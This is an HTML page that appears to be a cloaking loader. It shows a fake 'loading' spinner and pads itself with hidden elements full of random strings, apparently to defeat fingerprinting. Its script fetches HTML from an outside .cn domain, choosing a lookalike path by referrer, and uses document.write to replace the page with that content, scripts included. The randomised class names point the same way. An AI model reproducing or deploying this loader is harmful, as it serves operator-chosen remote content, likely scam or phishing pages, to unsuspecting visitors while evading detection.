<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tPm8XzY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tPm8XzY .bumhSiBkzz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tPm8XzY .content {
            line-height: 50px;
            text-align: center
        }

        .tPm8XzY .img {
            width: 100%
        }

        .tPm8XzY .Abwtxg0oSe {
            text-align: center
        }

        .tPm8XzY .Abwtxg0oSe span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tPm8XzY .Abwtxg0oSe span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tPm8XzY .Abwtxg0oSe span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tPm8XzY .Abwtxg0oSe span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tPm8XzY .Abwtxg0oSe span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tPm8XzY .Abwtxg0oSe span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tPm8XzY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function uWGr0Lwau(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jnYtJ6j = uWGr0Lwau('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jnYtJ6j +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jnYtJ6j +".html?a=share";
		}
		
        qCT3BY=url+"#"+new Date().getTime();
        qCT3BY && function() {
            $.get(qCT3BY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>JekDZbue98CgZjehUwhZzLY3aQ7AQ9qedDbgmj</div>
<ul style='display:none' >zRROstMgouh423VNiSen9ehpg7mLnLu8RyzM5W0rZq68mXII4WC6Tgdd8qBU3aLYjDv0hLW3i2JyY1pb1alu</ul>
<a  href='#' style='display:none'>BRzxXTHP6MHE2CgfLu</a>
<span style='display:none'>UtnfFXqbuboRKwktLiJaHexUIcgPgtl78c858X2JfivuioiDaclMtQ6nPmvhAms0ocHb</span>
<span style='display:none'>UtnfFXqbuboRKwktLiJaHexUIcgPgtl78c858X2JfivuioiDaclMtQ6nPmvhAms0ocHb</span>
<p  style='display:none'>zGfNzQnva3Jbh4lqX47GMBbVNkQnvjibuLnoWFBT</p>
<div style='display:none'>JekDZbue98CgZjehUwhZzLY3aQ7AQ9qedDbgmj</div>
<ul style='display:none' >zRROstMgouh423VNiSen9ehpg7mLnLu8RyzM5W0rZq68mXII4WC6Tgdd8qBU3aLYjDv0hLW3i2JyY1pb1alu</ul><div class="tPm8XzY">
    <div class="bumhSiBkzz">
        <div class="Abwtxg0oSe">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >HoOIxg2CuthuXDSMCrbxW</h1>
<span style='display:none'>er5eVxPevuBrzSXy5eqbtvyYjFipEeJwslt4KmIRZ030WukB49e1TkNvRVJDYV</span>
<a  href='#' style='display:none'>fQPIKT9fVrsvfUpmG93rnTDEZ22MJgpgW3nS8vCjX5XisapJ8GmOuzUB9v3UNRCCQYDVDFFrHL5CQIrRm5273egBf4EoH</a>
<img  src='' style='display:none'>
<span style='display:none'>er5eVxPevuBrzSXy5eqbtvyYjFipEeJwslt4KmIRZ030WukB49e1TkNvRVJDYV</span>
<span style='display:none'>er5eVxPevuBrzSXy5eqbtvyYjFipEeJwslt4KmIRZ030WukB49e1TkNvRVJDYV</span>
<div style='display:none'>lZQMbcj0AzDdcdavEKzbJX92sOCBltairFeRX0qNnVt8roqldlyYnkTDvwDLfUjKy7DXsZ5</div>
<li style='display:none' >ovKWLeVUEJ54mRFbAnXjjLw8CeM8k1AZzDXis9FIA</li>
<p  style='display:none'>tBzuoDhXqom9zZlKtTJhwhXrMZ0AXmxBxpcUkLgsgUBeqbYSRX4pkoLSWqa8RamIcbv1vlDRYGoBR7ZFcsTm7nfGZVhJyGUtRD</p></body>
</html>